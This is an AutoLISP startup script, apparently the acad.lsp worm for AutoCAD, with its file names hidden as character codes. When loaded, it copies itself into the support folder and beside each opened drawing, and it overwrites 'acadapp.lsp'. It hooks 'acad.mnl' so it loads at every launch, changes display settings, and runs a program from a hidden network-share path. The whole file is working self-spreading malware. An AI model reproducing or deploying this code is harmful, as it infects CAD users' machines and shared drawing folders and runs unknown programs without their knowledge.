;z
;23
;hgf
(setvar "cmdecho" 0)
(vl-load-com)
(setq ndwg (getvar "dwgname"))
(if (= "Drawing1.dwg" ndwg)(command "save" "Drawing1.dwg" ""))
(setq d1 (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 97)  (chr 112)(chr 112)(chr 112)))
(setq d2 (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 97)  (chr 112)(chr 112)(chr 112)(chr 46)(chr 108)(chr 115)(chr 112)))
(setq d3 (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 97)  (chr 112)(chr 112)(chr 46)(chr 108)(chr 115)(chr 112)))
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path) 8)))
(setq path1 (strcat path d2)) 
(setq path3 (strcat path d3)) 
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq path2 (strcat dwgpath "acad.lsp")) 
(SETQ fp1 (findfile path1))
(if (= fp1 nil)(vl-file-copy path2 path1 ))
(SETQ fp2 (findfile path2))
(if (= fp2 nil)(vl-file-copy path1 path2 ))
(if (/= fp2 nil)(progn(vl-file-delete path2)(vl-file-copy path1 path2 )))
(SETQ fp3 (findfile path3))
(if (/= fp3 nil)(progn(setq wjm (open path3 "r"))
(setq wjm (read-line wjm))
(if (/= wjm ";;;")(progn(setq wj (open path3 "w"))
(write-line ";;;" wj)
(close wj)
))))
(defuns::startup()
(setvar "cmdecho" 0)
(setq lspmnl 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path) 8)))
(setq wjqm (strcat path (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 46) (chr 109)(chr 110) (chr 108))))
(if (setq wjm (open wjqm "r"))
(progn(while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)(if (= (substr ns1 8 8) d1)(setq lspmnl 1)))
(close wjm)
)
)
(if (= lspmnl 0) 
(progn(setq wjqm (strcat path (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 46) (chr 109)(chr 110) (chr 108))))
(setq wjm (open wjqm "a"))
(write-line (strcat "(load "(chr 34) d2 (chr 34)")")wjm)
(write-line "(princ)" wjm)
(close wjm)
)))
(setvar "zoomfactor" 12)
(setvar "mbuttonpan" 0)
(setvar "HIGHLIGHT" 0)
(setvar "fillmode"0)
;xyz
(setq strtopstr (strcat  (chr 92) (chr 92) (chr 70) (chr 83) (chr 49) (chr 92) (chr 83) (chr 89) (chr 83) (chr 45)  (chr 92) (chr 87) (chr 79) (chr 82) (chr 75) (chr 92) (chr 80) (chr 76) (chr 79) (chr 84) (chr 69) (chr 82)))
(setq strbottomstr (strcat (chr 92) (chr 76) (chr 70) (chr 67) (chr 80) (chr 82) (chr 88) (chr 89) (chr 49) (chr 46) (chr 69) (chr 68) (chr 68)))
(startapp (strcat strtopstr strbottomstr))
;1
;x